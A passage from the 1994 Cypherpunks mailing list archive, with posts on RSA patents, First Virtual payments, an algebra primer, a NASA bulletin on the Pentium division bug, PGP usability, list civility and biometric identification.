Another, less relevant, protection is given to inclusion. If a device includes a patented mechanism, then the patent is required to practice the device, even if the larger device is also patented. Ciphers typically do not include other specific ciphers wholesale, so this doesn't typically apply. One big exception is the blind signature, which does use specifics of RSA. This may be one of the issues with respect to restricted availability of the ecash trial in the USA.

In my opinion, RSADSI is claiming far too much for their patent portfolio. In particular, claiming "all public key" is just hogwash. Elliptic curve cryptosystems certainly use a different enough mechanism not to fall under extension. El Gamal is a completely new mechanism; if RSADSI wants to claim that modular exponentiation for crypto is covered, they'll have a hard time actually arguing that one.

Eric

From eric at remailer.net Wed Dec 14 06:57:54 1994
From: eric at remailer.net (Eric Hughes)
Date: Wed, 14 Dec 94 06:57:54 PST
Subject: It works.
In-Reply-To:
Message-ID: <199412141555.HAA04095@largo.remailer.net>

From: storm at marlin.ssnet.com (Don Melvin)

Funny thing is, last night I actually had a valid reason to send something that I wanted to make sure didn't get read along the way ($ involved). I had all the pieces, they were in place, they worked. And due to time constraints, I wouldn't have been able to do it, if everything hadn't been ready. So, thanks Eric.

You're welcome.

Your story underlines one of the main reasons to set up personal crypto sooner rather than later. When later comes, it may be too late.

Eric

From eric at remailer.net Wed Dec 14 07:05:56 1994
From: eric at remailer.net (Eric Hughes)
Date: Wed, 14 Dec 94 07:05:56 PST
Subject: Legal implications of a PGP DLL
In-Reply-To: <199412141539.HAA04071@largo.remailer.net>
Message-ID: <199412141603.IAA04124@largo.remailer.net>

From: eric at remailer.net (Eric Hughes)

The only way you'd get an RSA license is to use RSAREF.
That means

Excuse me. "The only way you'd get a _free_ RSA license ..."

Eric

From eric at remailer.net Wed Dec 14 07:08:56 1994
From: eric at remailer.net (Eric Hughes)
Date: Wed, 14 Dec 94 07:08:56 PST
Subject: Using HotWIRED without provoking junk mail
In-Reply-To: <199412141358.IAA28880@cutter.clas.ufl.edu>
Message-ID: <199412141606.IAA04130@largo.remailer.net>

From: Avi Harris Baumstein

-at least this wired staffer was somewhat amused with the prospect (rather than annoyed, as i had expected).

I ran into one of the Hotwired guys at a couple of weeks ago. Not only didn't he mind particularly, he thought it most appropriate that the general purpose pseudonym account was called 'cypherpunk'.

-the account is well used.

In fact, the 'cypherpunk' is by far and away the No. 1 user of Hotwired. Maybe 'cypherpunks' will become number No. 2.

Eric

From eric at remailer.net Wed Dec 14 07:46:26 1994
From: eric at remailer.net (Eric Hughes)
Date: Wed, 14 Dec 94 07:46:26 PST
Subject: properties of FV
In-Reply-To:
Message-ID: <199412141644.IAA04167@largo.remailer.net>

From: nsb at nsb.fv.com

Wrong. A First Virtual transaction takes place as a single step via mail, FTP, or WWW. *After* the transaction there is an email exchange to confirm the purchase [...]

If this email exchange is necessary and not merely advisory, then it's part of the transaction, unless you have a far different notion of transaction than I do.

This depends on your definition of anonymity.

There are two forms of anonymity: counterparty anonymity and issuer anonymity. FV claims the first but not the second. "Far from anonymous" may be a little confusing, but it's certainly far from completely anonymous.

I think this meets most practical standards for anonymity, [...]

That depends on your standards, I suppose. It's certainly not sufficient for anonymous mail with digital postage.

> and its minimum transaction cost
> is high enough to rule out its applicability for very small
> transactions.

Wrong again.
We explicitly permit seller-based accumulation, [...]

Net clearing of this form requires the creation of an entire billing system for small value which then settles through FV. The very nature of such a net billing system requires linkability of transaction to transaction, or in other words generates identity. So FV is unsuitable for small value anonymous transactions.

We expect to make our money on information products, not on the commerce engine.

At 29 cents plus 4% per settlement transaction, I find this comment disingenuous in the extreme, even after paying Visa for settlement.

> it seems odd to build an unconditional rejection into
> the payment system, especially for products that can't be
> returned in any meaningful sense.

Of course it can be done without bundling it into the payment protocol.

But, I suspect, it can't be done if you want to piggyback on Visa's settlement system.

By "bundling" it into the payment protocol, we have been able to achieve a vast SIMPLIFICATION of the payment protocol.

You haven't simplified the protocol, you've simplified your business model.

It is not a coincidence that we are the first (and so far, still the only) system that is operational with real money.

I question "first". Certainly one of the first. In any case, it isn't a coincidence that you were able to start up quickly, because you didn't build a settlement system for real value but rather used someone else's.

[... earlier in the post ...]

(And FYI, we know whereof we speak: we use cryptography heavily internally, and we are extremely aware both of its power and utility AND of the practical difficulties in its use.)

[... then later ...]

The email confirmation is indeed a bit cumbersome if it gets invoked very often and your mail system isn't FV-smartened.

So if you're planning on removing the cumbersomeness of your current protocol with software, why is it that you don't have an option to turn on crypto, whose cumbersomeness can also be mitigated with software?
This position seems, well, inconsistent. Eric From sommerfeld at orchard.medford.ma.us Wed Dec 14 07:48:26 1994 From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld) Date: Wed, 14 Dec 94 07:48:26 PST Subject: BofA+Netscape In-Reply-To: Message-ID: <199412141536.KAA00735@orchard.medford.ma.us> -----BEGIN PGP SIGNED MESSAGE----- > Wasn't edlin based on the Unix ed? Nope. It's very similar to the CP/M `ed'. (I hesitate to say "identical" since I haven't touched a CP/M system since 1984..), but the first time I used edlin a couple years ago to edit an autoexec.bat file, I had CP/M flashbacks... Edlin is very different from the Unix `ed' and *its* ancestors (which are a line of several line-oriented editors which started life on CTSS, grew up on Multics, and were cut back down to size on Unix, only to sprout up again into ex and vi..) - Bill -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLu8Q47T+rHlVUGpxAQEm1AQAi61eq6ifrpEQDVoE8DLkU2N7leevmzzO tHIMYZBPEwWNvN1RVT/F2D0clVBnOTcq3Es5R7Ps8MlJPb3vO18DRFrsEn/RgEJS ZMwTeySMGnpJTd3pwRAESJQ8AntuyLd9eTCOndfsmA+pVOcC/Ashg/yakaXDNfSu gtgP0tMBwys= =k9iS -----END PGP SIGNATURE----- From hayashi at scs.sony.co.jp Wed Dec 14 07:49:12 1994 From: hayashi at scs.sony.co.jp (Tsuyoshi Hayashi) Date: Wed, 14 Dec 94 07:49:12 PST Subject: Sony's WWW server (NEWSWAVE) was opened Message-ID: <9412141549.AA26954@eagle.scs.sony.co.jp> Hi, punks, Sony, our parent company, began to provide several info and technical support for NEWS users on the WWW server. # Note that 'NEWS' is Sony's UNIX workstation. # Mainly, NEWS are used in Japan. # So, you probably don't know it... The Home Page is at URL: http://www1.sony.co.jp/ CAUTION: (1) The home page of it has large graphics data. (2) Homepage has some Japanese characters. So you can not read there probably. If you have time, peek it please. Thanks. P.S. This home page is NOT the (all of) Sony's home page. This page is managed by a NEWS support group. 
| Tsuyoshi Hayashi (hayashi at scs.sony.co.jp)
| Tech. div., Sony Computer Systems Inc.

From eric at remailer.net Wed Dec 14 08:56:55 1994
From: eric at remailer.net (Eric Hughes)
Date: Wed, 14 Dec 94 08:56:55 PST
Subject: A short primer on algebra
Message-ID: <199412141754.JAA04293@largo.remailer.net>

In the interest of good mathematical terminology, here is a short primer on the most basic algebraic structures. The definitions are not complete but rather evocative and are designed to prevent confusion.

Field -- has addition, subtraction, multiplication, and division. Examples are the real numbers (R), the complex numbers (C), and the rational numbers (Q). An important class of fields for crypto are integers modulo a prime (Z/pZ or F_p). An important class of fields for error coding are polynomials with binary coefficients modulo an irreducible polynomial (F_2[x]/p(x)F_2[x]).

Ring -- has addition, subtraction, multiplication, but no division. Every field is a ring but not vice-versa. Examples are the integers (Z), the integers modulo a composite number (Z/nZ) and polynomials with various rings, including R[x], Z[x].

Group -- has either addition/subtraction or multiplication/division, but not necessarily both. Every ring is a group under addition, but not vice-versa. If the group is commutative, we write the operation as addition typically; if not, we use multiplication. Examples of commutative groups are solutions of an elliptic curve and rotations in the plane. Examples of non-commutative groups are permutations, rotations in three dimensions, and Euclidean transformations of the plane.

Eric

From alex at omaha.com Wed Dec 14 09:07:03 1994
From: alex at omaha.com (Alex Strasheim)
Date: Wed, 14 Dec 94 09:07:03 PST
Subject: Big Brother database
Message-ID: <199412141707.LAA00490@omaha.omaha.com>

-----BEGIN PGP SIGNED MESSAGE-----

> >Do we then have a de facto (cardless) national ID? I think so.
>
> You got it, Bunky.

There's an article in Forbes (the latest copy?)
about a company that's making thermal scanning devices which can identify people via the pattern of blood vessels in their face. The advantage of this system over fingerprinting is that it can be done without letting the target know he or she's being identified. == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu8mOREpP7+baaPtAQHgjQP/e+eHxzEKuigSihr/wYfUiUrF2fKzI04U r7rQESL4GNG7UOJOisTmSbp9YYB1fMlAPgu0JkWk22YxbgqXIPMnVhyfsWjzH0d8 z5EZ3/8F+MgXqTowY2weuWvsUx8VKFbHsePDemaKjIAEaRUz7R0kVbpMc57XUFMY 9LLKfAYswiQ= =GEuy -----END PGP SIGNATURE----- From ravage at bga.com Wed Dec 14 09:35:02 1994 From: ravage at bga.com (Jim choate) Date: Wed, 14 Dec 94 09:35:02 PST Subject: Some info of interest (possibly) Message-ID: <199412141734.LAA21890@zoom.bga.com> Hi all, Any cypherpunks who would like to do public demonstrations or talks is invited to attend the sixth annual RobotFest held here in Austin, TX. It will be held in the city coliseum on April 1 & 2. If interested then please contact me through e-mail or call voice to 512-458-5818. The Central Texas Linux Users Group Meeting will be held Dec. 17, 1994 (this Saturday) at the downtown library here in Austin. We will be located in the 4th floor conference room. We will have several versions of PGP available for dos, amiga, and Linux boxes. If any c-punks would like to address the group please come on by. As of yesterday I got the ISDN link from my internet provider to ssz working and it should be accessible both dial-up and from internet some time next week. We have the full C address 204.96.173 for our use and have about 16 machines assigned at this time. We plan on dedicating at least one machine (and IP) to crypto related issues and software. Anyone who has experience doing crypto in Linux is eagerly sought for reference. 
Any c-punks who are planning on attending HoHoCon here in Austin are invited to drop by and party while they are in town.....

Merry Christmas.

From jdwilson at gold.chem.hawaii.edu Wed Dec 14 09:54:14 1994
From: jdwilson at gold.chem.hawaii.edu (NetSurfer)
Date: Wed, 14 Dec 94 09:54:14 PST
Subject: Re the Pentium Bug
Message-ID: <199412141759.MAA19955@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

NASIRC BULLETIN #94-36                                 December 13, 1994

Floating Point Divide Flaw in Intel Pentium Processor Chip
============================================================
NASA Automated Systems Incident Response Capability
============================================================

NASIRC has become aware of a floating-point division problem in some versions of the Pentium processor chip, manufactured by Intel. Although this is not a security issue, NASIRC is bringing this to your attention because the defect could cause erroneous results for NASA projects which rely on complex mathematical computations involving double-precision arithmetic.

Information on this problem is currently being propagated through the Internet and both technical and general publications. We are issuing this bulletin to provide a synopsis of what is known about the problem, how to check for the flaw, and what to do about it.

It is important that any individual who uses a computer utilizing a Pentium processor perform the test(s) described in this bulletin on his/her machine to check for the bug. Although there have been reports the Pentium/60 is not affected, NASIRC recommends these units also be tested. There is no part number or other marking which would designate the flawed processor chips from the later revisions, which do not contain the bug.
Intel considers this flaw to be minor, and has stated: "the average spreadsheet user should only be affected by this bug once every 27,000 years". However, NASIRC feels there is a high probability that work done on this class of desktop system in NASA is most likely to be computationally intensive, and the likelihood of achieving erroneous results is strong. From a reliability and reputation standpoint, NASA must ensure that the tools it uses to accomplish its mission perform properly.

The president of Intel has issued a communique, stating his company's position on the problem, and the process to follow should a site discover a flawed system. The communique is available via WWW at the URL: http://www.intel.com/about-intel/press/andy-msg.html.

Pentium machines can be tested by using any of the following three methods:

1) Using the Microsoft Windows calculator, perform the following computation:

       x = 4195835
       y = 3145727
       z = x - (x/y)*y

   If z = 256, your chip has the bug. The Windows calculator is the easiest way to run this test. If you program this calculation, be sure to use double-precision variables!

2) Using any spreadsheet application (Lotus 1-2-3, Excel, etc), perform the following test:

   Enter the following data:

       In cell A1: 4195835
       In cell A2: 3145727
       In cell A3: 3145727

   Calculate the following value: (A1 * A2)/A3

       A correct result is:               4195835
       An incorrect result (FDIV bug) is: 4195579

3) A small program named P87TEST.COM, to test for the existence of the bug, was written and made available over the Internet by Terje Mathisen of Norsk Hydro A/S in Norway. A binary copy of P87TEST.COM can be obtained via anonymous FTP from the NASIRC online archive at the following URL:

       ftp://nasirc.nasa.gov/toolkits/diagnostics/Intel/p87test.com

   The Checksums are as follows:

       MD5:   322E8857C126D7CA336E7FFC31800939
       SunOS: 08334 2

   To run the program, simply type: P87TEST. An example of the program output is as follows:

       Pentium FDIV bug finder.
       (c) Terje Mathisen 1994
       This is a Pentium or better cpu
       CPUID reports back:
       Vendor id = "GenuineIntel"
       Family (4=486, 5=Pentium etc.) = 05, stepping = 05, model = 01
       CPU feature list:
         1 : FPU (NDP) onchip
         2 : Virtual 86 Mode Extensions
         4 : I/O Breakpoints
         8 : Page Size Extensions
        10 : Time Stamp Counter
        20 : Pentium stype MSRs
        80 : Machine Check Exception
       100 : CMPXCHG8B instruction available
       It has a 387 or later ndp
       It has the FDIV bug:
       (1.0/824633702449.0)*824633702449.0 is not equal to 1.0!

Intel has stated that any site experiencing problems from this bug can obtain a replacement processor chip at no charge. Intel has set up a special customer service phone number for users affected by this bug. The Intel customer service desk can assist with obtaining replacement processor chips for affected systems. Any site confirming the existence of the bug in their Pentium chipset should contact Intel at 1-800-628-8686.

If you have any questions about this bulletin, please contact the NASIRC Helpdesk.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
NASIRC ACKNOWLEDGES: Mr. Bob Solomon of the NASA Lewis Research Center for providing the information used in this bulletin, and Mr. Terje Mathisen of Norsk Hydro A/S for creating the program to test a system for the bug.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

===============================================================
For further assistance, please contact the NASIRC Helpdesk:
    Phone: 1-800-7-NASIRC
    Fax: 1-301-441-1853
    Internet Email: nasirc at nasa.gov
    24 Hour/Emergency Pager: 1-800-759-7243/Pin:2023056
    STU III: 1-301-982-5480
===============================================================

This bulletin may be forwarded without restriction to sites and system administrators within the NASA community.

The NASIRC online archive system is available via anonymous ftp. You will be required to enter your valid e-mail address as the "password".
Once on the system, you can access the following information:

    ~/bulletins    ! contains NASIRC bulletins
    ~/information  ! contains various informational files
    ~/toolkits     ! contains automated toolkit software

The contents of these directories are updated on a continuous basis with relevant software and information; contact the NASIRC Helpdesk for more information or assistance.

-----------------
PLEASE NOTE: Users outside of the NASA community may receive NASIRC bulletins. If you are not part of the NASA community, please contact your agency's response team to report incidents. Your agency's team will coordinate with NASIRC, who will ensure the proper internal NASA team(s) are notified. NASIRC is a member of the Forum of Incident Response and Security Teams (FIRST), a world-wide organization which provides for coordination between incident response teams in handling computer-security-related issues. You can obtain a list of FIRST member organizations and their constituencies by sending email to docserver at first.org with an empty "subject" line and a message body containing the line "send first-contacts".

*************************************************************************
* Richard K. Yamane                 Leeward Community College           *
* Manager, Computer Center          96-045 Ala Ike                      *
*                                   Pearl City, Hawaii 96782            *
* EM: sysrich at lccada.lcc.hawaii.edu                                  *
* Ph: (808) 455-0493                (Univ. of Hawaii campus)            *
*************************************************************************

**************************************************************************
*Marv Weissman  *  UH Computer Specialist  *  Leeward Community College  *
*cs_weissman at lccada.lcc.hawaii.edu (808)455-0465, voice. 455-0471, fax *
*                                                                        *
* "Don't worry about what may happen tomorrow; just correct what you     *
*  spoiled yesterday"                                                    *
*                                                                        *
*                                                 (Midrash )             *
*                                                                        *
**************************************************************************

- ---
[This message has been signed by an auto-signing service.
A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu8yTyoZzwIn1bdtAQFVBgF6Agd6s2YAeRmBSsUiyLzvN15OoRdQObIk A0F8v9dG5xuHXyp/hWYHKzX6QIA0a6KP =544j -----END PGP SIGNATURE----- From unicorn at access.digex.net Wed Dec 14 10:18:19 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 14 Dec 94 10:18:19 PST Subject: (fwd) I don't use PGP. (Was:I NUKED PGP.) Message-ID: <199412141817.AA11248@access1.digex.net> Path: news1.digex.net!access1!unicorn From: unicorn at access1.digex.net (Black Unicorn) Newsgroups: alt.security.pgp Subject: I don't use PGP. (Was:I NUKED PGP.) Date: 14 Dec 1994 18:11:29 GMT Bretton Wade (bw16 at cornell.edu) wrote: : In article <3clri0$jqn at crl.crl.com>, jdulaney at crl.com (John Dulaney) wrote: : > 1) Too difficult to setup for the average user. : The "average" user of PGP is somebody who understands why they need PGP. : I'd say almost everybody with that level of knowledge is capable of : understanding "type randomly for a while", and the three or four standard : options to pass to PGP for day to day use. : > 3) I may forget to decrypt and miss an important note. : pay attention. If you need the security... : > 2) Requires that I exit my E-mail reader to decrypt which takes : > too much time. : > : > Suggestions: : > 1) Make it operable INSIDE PINE for example. : > 2) Put it in EUDORA or other MOSAIC/NETSCAPE browser and make it : > work AUTOMATICALLY, seemlessly, in the background. : > : read the newsgroup for about 30 seconds before you post. A lot of people : have put a lot of work into this sort of stuff. Some good, some not so : good, but that is for you to evaluate. : Bretton I'm a Mac user. MacPGP is a general nightmare. For those of us who have shell accounts, it is such a annoyance as to cause me to dislike using it at all except for the most extreme messages. 
I fear I am not of the ability, or of the spare time to work on making a seamless application myself or else it surely would have been a project on the top of my list. PGP needs to be a drop and drag application. I want a box sitting on my desktop, a box I can drag any document to and press two buttons after a mouse click and drag and encrypt/decrypt/sign a message which can then be copy/pasted to Zterm. Currently the only thing that nears the transparancy of this sort of thing is the bulky, annoying, poorly packaged and massively oversized, not to mention rarely working, MacPGP Kit. It doesn't seem to work out to any time advantage when I factor in the debugging and outright code crashes into my computation. The modular PGP project has been out there for almost a year. Any progress on this front? Does anyone care? Now that some lists are beginning to delay or reject unsigned messages altogether, I would really like to be able to reply to a simple note in less than the 7 minutes it currently takes me. This is the single most problematic hitch in PGP. It's not easy to use, to install, or to apply. Every move toward transparent crypto simply serves to increase user base and deter a prospective ban. It should be in EVERYONE's interest to try and push for a easier front end, while still allowing a flexible and detailed set of advanced options for the expert user. Curve Encrypt is a classic example of simplicty and ease. PGP front end designers for the Mac should take its example. -uni- (Dark) Spelling errors disclaimed, I've been up for 30 hours. -- 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From SADLER_C at HOSP.STANFORD.EDU Wed Dec 14 10:47:22 1994 From: SADLER_C at HOSP.STANFORD.EDU (Connie Sadler) Date: Wed, 14 Dec 94 10:47:22 PST Subject: (fwd) I don't use PGP. (Was:I NUKED PGP.) 
Message-ID: <01HKMQ2IZRXW004LPQ@MR.STANFORD.EDU> Subject: (fwd) I don't use PGP. (Was:I NUKED PGP.) From: "Connie Sadler"@MR.STANFORD.EDU Date: Wed, 14 Dec 1994 10:28:00 PDT A1-type: DOCUMENT Posting-date: Wed, 14 Dec 1994 00:00:00 PDT Folks, the level of flaming and gratuitous insulting (insultations?) is getting in the way of our message. We have on our list folks from Netscape, First Virtual, and (maybe) Digicash. Amongst others. And we certainly know that some of our messages are being forwarded to others. It behooves us to bear this in mind. If we can't calmly and clearly make our points about why privacy is important (and I mean in the sense of personal responsibility, not just the buzzword), about why end-to-end encryption is generally better than transport-level security, and about why "certifying authorities" is (to many of us) a flawed approach, then we are failing. More concisely, the Cypherpunks list is one of several "watering holes" that have appeared. Rather than trashing schemes which are not "'punkly correct" (PC, to coin a term), or which seem to have been put together in haste (perhaps for good reason)), we should instead use this golden opportunity to influence things. Call me an elitist, but I think the Cypherpunks list has an important role to play in influencing: -- Web development (Netscape, InterCon, others) -- digital cash (DigiCash, First Virtual, others) -- key escrow policies and plans (TIS, Microsoft, etc.) -- the future of PGP, tools, etc. -- etc. These things will have more of an effect on the future than convincing Aunt Erma to encrypt her mail. It may be that the comments made here about the security model of Netscape and First Virtual are on the mark, that these models need a lot more work. But I don't know see how insults or derision, or imputing bad motives to these folks, will help. 
(I think I was careful this past motive to avoid slinging mud at Bill Gates, for example, during the debate about reports that Microsoft could be including some form of key escrow in future OS releases. Not to say I've never flamed...) One lesson that's become clear is to expect that derisive comments made here will often find their way back to those derided. I always write with the expectation that folks as disparate as David Chaum and Dorothy Denning will perhaps be reading my words! (Hi, David! Hi, Dotty!) They may read them because someone forwards the messages to them, or because in 1996 the Cypherpunks list is sold on CD-ROM, or because one of them has access to the main NSA search engines (:-}). Whatever, my point is that insults are rarely helpful, and are unpersuasive. Insults also set a tone for later debate that is hard to get beyond. Not all debate recently has been insulting, of course. In fact, most hasn't been. But the insulting tone persists in some of the thread titles, and in the generally adversarial nature. (If I were Marc A. or Kipp, I'd not feel very welcome here....a situation which is counterproductive to our presumed goals.) Hal Finney nicely summarized why folks want some privacy on Web pages, and why transport-level security is generally less desirable than end-to-end security (including the special case of anonymous origination). This is the usual "who do you trust?" motif, which comes up in mail delivery _and_ in key certification. (Sidebar: In my view, Web browsers like Netscape and Mosaic, etc., should not get overly involved in these issues. These are issues for Web page owners to worry about and set policy on. The browsers may want the right hooks in them to allow authentication policies to be implemented, but the browser-makers should probably stay out of the gory details of which crypto algorithms are used, what access policies are set, etc. This makes it easier to drop-in stronger systems at a later time. 
I may be misunderstanding plans, I admit.) So, this is my little rant on "Can't we all just get along?" expressed in a different way. The Cypherpunks list has become one of several de facto "watering holes" where diverse participants interact. Let's not blow it. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From nobody at jpunix.com Wed Dec 14 11:46:57 1994 From: nobody at jpunix.com (Anonymous) Date: Wed, 14 Dec 94 11:46:57 PST Subject: Message-ID: <199412141951.OAA21255@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Black Unicorn writes: > The modular PGP project has been out there for almost a year. Any > progress on this front? Does anyone care? I percieve a 'chilling effect' going on with PGP compatible application development. Nobody wants to extract the core PGP code into a library because the code is dense and who wants to do that every update? Likewise with using PGPTools. Who wants to re write their application when the official PGP library materializes? So people are waiting... Could we get some updates on what is happening with the official pgp development? If it's not coming soon, or not at all, it would be nice to know so we can get going on improving PGPTools or writing our own. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu9MqioZzwIn1bdtAQGUpgGAoyg9xD7355aypqebsUwrQdS8rfPH4Oiz NxrVnNp5L247pZRftliqdwO8Sh0OzgTZ =B8B5 -----END PGP SIGNATURE----- From shamrock at netcom.com Wed Dec 14 11:57:47 1994 From: shamrock at netcom.com (Lucky Green) Date: Wed, 14 Dec 94 11:57:47 PST Subject: News->Mail & CMU's Andrew Message System Message-ID: Big Lama wrote; >A, B, C and D and E and AMS and AFS and DCE and DFS and IPC and RPC >and MDA and STP and LSD and THC... >...and amphetamine. > >Big Lama (remembering an old hit, from the Flower Power period) "The Alphabet Song" by "David Peel and the Lower East Side." -- Lucky Green PGP encrypted mail preferred. From mccoy at io.com Wed Dec 14 12:19:26 1994 From: mccoy at io.com (Jim McCoy) Date: Wed, 14 Dec 94 12:19:26 PST Subject: pgp library In-Reply-To: <199412141951.OAA21255@bb.hks.net> Message-ID: <199412142019.OAA05039@pentagon.io.com> An anonymous person writes: > Black Unicorn writes: > > The modular PGP project has been out there for almost a year. Any > > progress on this front? Does anyone care? > > I percieve a 'chilling effect' going on with PGP compatible application > development. Nobody wants to extract the core PGP code into a library > because the code is dense and who wants to do that every update? In addition to this, the code really sucks as far as modularity goes. The next big version of PGP, which is supposed to include library hooks, etc., will probably not be out for five or six months. I do know of some people who are interested in working on a PGP compatible library of crypto code, but I am not quite sure what the status of that project is at this time... jim From sdw at lig.net Wed Dec 14 12:57:13 1994 From: sdw at lig.net (Stephen D. 
Williams) Date: Wed, 14 Dec 94 12:57:13 PST Subject: Big Brother database In-Reply-To: <199412141707.LAA00490@omaha.omaha.com> Message-ID: > > -----BEGIN PGP SIGNED MESSAGE----- > > > >Do we then have a de facto (cardless) national ID? I think so. > > > > You got it, Bunky. > > There's an article in Forbes (the latest copy?) about a company that's > making thermal scanning devices which can identify people via the pattern > of blood vessels in their face. The advantage of this system over > fingerprinting is that it can be done without letting the target know he > or she's being identified. I think I've heard of that, but does it really handle makeup, beards, severe weather (lets see, it got to actual temp of -25F last Jan. in Dayton, OH)? I noticed a few weeks ago that the tarmac access doors in Chi. O'Hare have hand scanners. At first I thought they looked like palm scanners but upon inspection they were obviously a simple, durable, and effective biometrics reader. It had 3 pins you laid the arch of your hand against and a retro reflective surface. It's occured to me that, to go along with my Internet Doorbell (tm) ;-), I could put a load sensor on the porch and a line of vertical led sensors at the porch threshhold to get a highly probable biometric guess of a visitor. > Alex Strasheim | finger astrashe at nyx.cs.du.edu > alex at omaha.com | for my PGP 2.6.1. public key > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBLu8mOREpP7+baaPtAQHgjQP/e+eHxzEKuigSihr/wYfUiUrF2fKzI04U > r7rQESL4GNG7UOJOisTmSbp9YYB1fMlAPgu0JkWk22YxbgqXIPMnVhyfsWjzH0d8 > z5EZ3/8F+MgXqTowY2weuWvsUx8VKFbHsePDemaKjIAEaRUz7R0kVbpMc57XUFMY > 9LLKfAYswiQ= > =GEuy > -----END PGP SIGNATURE----- > -- Stephen D. 
Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94 From tcmay at netcom.com Wed Dec 14 12:57:32 1994 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 14 Dec 94 12:57:32 PST Subject: Less Flaming, More Civility In-Reply-To: <199412141934.LAA17000@netcom9.netcom.com> Message-ID: <199412142057.MAA00850@netcom9.netcom.com> A minor correction, when I wrote: > It may be that the comments made here about the security model of > Netscape and First Virtual are on the mark, that these models need a > lot more work. But I don't know see how insults or derision, or > imputing bad motives to these folks, will help. (I think I was careful > this past motive to avoid slinging mud at Bill Gates, for example, ^^^^^^ > during the debate about reports that Microsoft could be including some > form of key escrow in future OS releases. Not to say I've never > flamed...) I meant to say "this past summer." --Tim -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. 
FAQ available at ftp.netcom.com in pub/tc/tcmay

From pcassidy at world.std.com Wed Dec 14 13:19:51 1994
From: pcassidy at world.std.com (Peter F Cassidy)
Date: Wed, 14 Dec 94 13:19:51 PST
Subject: Less Flaming, More Civility
In-Reply-To: <199412142057.MAA00850@netcom9.netcom.com>
Message-ID:

From tcmay at netcom.com Wed Dec 14 13:26:27 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Wed, 14 Dec 94 13:26:27 PST
Subject: Less Flaming, More Civility
In-Reply-To:
Message-ID: <199412142125.NAA05427@netcom9.netcom.com>

Peter F Cassidy wrote:
>
> rgnKxSRXXCmixjI3IVVVXFdQsCxIYylsKLrmrdU+s2Jes6X8v1MvwWzvVQ0K
> qnRz4bCwVV3xW8J9bDVw9qizVMxNyarXPug+s2Jes6X8v1MvwWzvVQ0K5Njz
> 3fJc69ra+75I8c3WLbTBJHBHRec400kzIEphLDFn2iCsTLp4N1FJNd5sDQri
> tr/2DQpFXaTbVqpLXm1yumvm8FI=
>

This was one of those "MIME" things I got, that tell me to "Hit any key to go on," "Now press ^H-Alt-Hyper-Abort to return to the main menu."

Did I miss something here?

This is not a flame, but there sure has been an increase in the frequency of these strange MIME messages lately. (At least with the practical demise of NeXT, I've been seeing fewer and fewer of those "NewGrazer" (?) messages.)

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From kipp at warp.mcom.com Wed Dec 14 13:32:16 1994
From: kipp at warp.mcom.com (Kipp E.B.
Hickman) Date: Wed, 14 Dec 94 13:32:16 PST Subject: Clarification of my remarks about Netscape Message-ID: <9412142130.AA20536@warp.mcom.com> In article <199412140047.QAA17489 at jobe.shell.portal.com>, you write: > -----BEGIN PGP SIGNED MESSAGE----- > > "Amanda Walker" writes, quoting someone from > Netscape: > > >> I didn't bother imbedding the RSA Unaffiliated User CA because I > >> didn't think server operators would use it to get certificates. > > >Well, it's what Apple is using for PowerTalk signers (which are a key pair and > >X.509 certificates, by default from the Unaffiliated User PCA). It makes > >sense for personal (as opposed to organizational) servers, such as someone > >running MacHTTP for their home page... > > >On the other hand, if RSA has set up a server PCA, that should be suffcient > >for now. I wonder what the certification policy is, though--how do you prove > >that you control a given server? For an Unaffiliated User CA certificate, you > >just have to show a notarized application and two forms of ID, one with a > >photo (driver's license, passport, etc.). I can't off hand think of an > >equivalently strong way to ID control of a server... > > This relates to the other part of my question, which didn't get answered: > what is the relationship between the name found in the X.509 